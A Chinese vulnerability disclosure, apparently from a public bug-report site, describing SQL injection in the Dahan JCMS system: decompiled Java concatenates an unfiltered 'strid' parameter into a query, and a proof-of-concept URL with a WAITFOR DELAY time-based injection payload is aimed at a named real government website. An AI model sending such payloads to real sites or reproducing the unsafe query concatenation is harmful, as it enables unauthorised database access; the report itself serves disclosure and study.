### 简要描述:
大汉jcms 注入漏洞
### 详细说明:
jcms.blf.user.CatalogBlf.class
```
public boolean doDelete(String strId)
{
boolean flag = false;
String strSql = "SELECT i_id FROM wap_cataloginfo WHERE i_parentid IN(" + strId + ") OR i_id IN(" + strId + ")";//这里的strid没过滤
String[][] arrAnswer = Manager.doQuery(this.strAppID, strSql);
if (arrAnswer != null)
{
StringBuffer sbId = new StringBuffer(arrAnswer.length * 2);
for (int i = 0; i < arrAnswer.length; i++)
{
sbId.append(arrAnswer[i][0]);
sbId.append(",");
}
```
调用文件
m_5_d/opr_wap_col.jsp
```
}else if("D".equals(strBillStatus))
{
boolean flag=false;
String strid = Convert.getParameter(request,"strid");
StringBuffer sbScript = new StringBuffer();
flag = catalogblf.doDelete(strid);//妥妥的注入漏洞
if(flag)/
{
String [] arrid = strid.split(",");
for(int i=0;i<arrid.length;i++)
```
### 漏洞证明:
打开www.sihong.gov.cn/jcms/m_5_d/opr_wap_col.jsp?strid=122222222&fn_billstatus=D
返回时间正常
打开http://www.sihong.gov.cn/jcms/m_5_d/opr_wap_col.jsp?strid=122222222);WAITFOR DELAY '0:0:5'--&fn_billstatus=D
延时5秒左右 标准的延时注入
[<img src="https://images.seebug.org/upload/201405/22151402a1075ca7b930eadad55981d2a869ad14.png" alt="dahan.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/22151402a1075ca7b930eadad55981d2a869ad14.png)
京公网安备 11010502034610号
暂无评论